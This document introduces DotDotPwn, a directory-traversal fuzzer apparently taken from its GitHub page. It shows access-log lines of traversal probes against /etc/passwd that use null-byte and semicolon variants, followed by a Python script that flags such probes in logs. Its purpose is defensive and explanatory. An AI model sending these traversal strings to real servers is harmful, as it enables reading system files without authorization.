Source: https://github.com/hatRiot/dotdotpwn

DotDotPwn - The Directory Traversal Fuzzer

It's a very flexible intelligent fuzzer to discover traversal 
directory vulnerabilities in software such as HTTP/FTP/TFTP 
servers, Web platforms such as CMSs, ERPs, Blogs, etc. 

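It is written in Perl.

Use it with care, though: it is better not to test against a production environment, because it generates a veeeery large number of GET log entries.

(I didn't expect there to be so many ..)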

10.10.10.134 - - [01/Aug/2014:13:19:52 +0800] "GET /../../../../etc/passwd%00 HTTP/1.0" 404 1311 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.2.6; Hotbar 3.0)\r"
10.10.10.134 - - [01/Aug/2014:13:19:52 +0800] "GET /../../../../etc/passwd%00index.html HTTP/1.0" 404 1311 "-" "Mozilla/4.0 (compatible; MSIE 5.2; Mac_PowerPC)\r"
10.10.10.134 - - [01/Aug/2014:13:19:53 +0800] "GET /../../../../etc/passwd%00index.htm HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-CA; rv:1.9.1.11pre) Gecko/20100629 SeaMonkey/2.0.6pre\r"
10.10.10.134 - - [01/Aug/2014:13:19:53 +0800] "GET /../../../../etc/passwd;index.html HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko) (Kubuntu package 4:3.4.3-0ubuntu1)\r"
10.10.10.134 - - [01/Aug/2014:13:19:53 +0800] "GET /../../../../etc/passwd;index.htm HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.9) Gecko/20100331 Firefox/3.5.9 Lunascape/6.1.4.21478\r"
10.10.10.134 - - [01/Aug/2014:13:19:53 +0800] "GET /../../../../../etc/passwd%00 HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8\r"
10.10.10.134 - - [01/Aug/2014:13:19:54 +0800] "GET /../../../../../etc/passwd%00index.html HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4\r"
10.10.10.134 - - [01/Aug/2014:13:19:54 +0800] "GET /../../../../../etc/passwd%00index.htm HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061230 BonEcho/2.0.0.1\r"
10.10.10.134 - - [01/Aug/2014:13:19:54 +0800] "GET /../../../../../etc/passwd;index.html HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5\r"
10.10.10.134 - - [01/Aug/2014:13:19:55 +0800] "GET /../../../../../etc/passwd;index.htm HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1\r"
10.10.10.134 - - [01/Aug/2014:13:19:55 +0800] "GET /../../../../../../etc/passwd%00 HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.6) Gecko/20070809 Camino/1.5.1\r"
10.10.10.134 - - [01/Aug/2014:13:19:55 +0800] "GET /../../../../../../etc/passwd%00index.html HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Darwin; FreeBSD 5.6; en-GB; rv:1.9.1b3pre)Gecko/20081211 K-Meleon/1.5.2\r"
10.10.10.134 - - [01/Aug/2014:13:19:56 +0800] "GET /../../../../../../etc/passwd%00index.htm HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Fedora/1.0.4-1.3.1 Firefox/1.0.4\r"
10.10.10.134 - - [01/Aug/2014:13:19:56 +0800] "GET /../../../../../../etc/passwd;index.html HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Iceweasel/2.0 (Debian-2.0+dfsg-1)\r"
(rest omitted)
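
Added example (not from the original post or the DotDotPwn project): a small Python triage script for the kind of access-log noise shown above. It groups traversal-style requests by client, records the deepest `../` chain and the response codes, and flags clients that send a different User-Agent on each probe, as 10.10.10.134 does in the log; the sample lines, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in Apache combined log format, modelled on the entries above;
# the percent-encoded line and the benign 192.0.2.10 request are constructed test cases.
SAMPLE_LOG = r'''10.10.10.134 - - [01/Aug/2014:13:19:52 +0800] "GET /../../../../etc/passwd%00 HTTP/1.0" 404 1311 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r"
10.10.10.134 - - [01/Aug/2014:13:19:53 +0800] "GET /../../../../etc/passwd;index.html HTTP/1.0" 400 1369 "-" "Mozilla/5.0 (compatible; Konqueror/3.4; Linux)\r"
10.10.10.134 - - [01/Aug/2014:13:19:55 +0800] "GET /../../../../../../etc/passwd%00index.htm HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (X11; U; Linux i686) Firefox/1.0.4\r"
10.10.10.134 - - [01/Aug/2014:13:19:56 +0800] "GET /%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.0" 404 1311 "-" "Mozilla/5.0 (Macintosh) Camino/1.5.1\r"
192.0.2.10 - - [01/Aug/2014:13:20:01 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# client, request path, status, user agent
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

def traversal_depth(path):
    """Count ../ or ..\\ steps after undoing up to two layers of percent-encoding."""
    decoded = unquote(unquote(path))
    return len(re.findall(r'\.\.[/\\]', decoded))

def summarize(log_text):
    """Per-client summary of traversal probes: count, max depth, user agents, statuses."""
    stats = defaultdict(lambda: {"probes": 0, "max_depth": 0, "agents": set(), "statuses": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, path, status, agent = m.groups()
        depth = traversal_depth(path)
        if depth == 0:
            continue  # ordinary request, ignore
        s = stats[ip]
        s["probes"] += 1
        s["max_depth"] = max(s["max_depth"], depth)
        s["agents"].add(agent)
        s["statuses"].add(int(status))
    return dict(stats)

def flag_fuzzers(log_text, min_probes=3, min_agents=3):
    """Flag clients with several probes and a rotating User-Agent (assumed thresholds)."""
    return sorted(ip for ip, s in summarize(log_text).items()
                  if s["probes"] >= min_probes and len(s["agents"]) >= min_agents)

if __name__ == "__main__":
    for ip, s in summarize(SAMPLE_LOG).items():
        print(ip, s["probes"], s["max_depth"], sorted(s["statuses"]))
    print("flagged:", flag_fuzzers(SAMPLE_LOG))
```

For a flagged client, any status outside 4xx in its summary is the request to look at first, since it means the server did something other than reject the path.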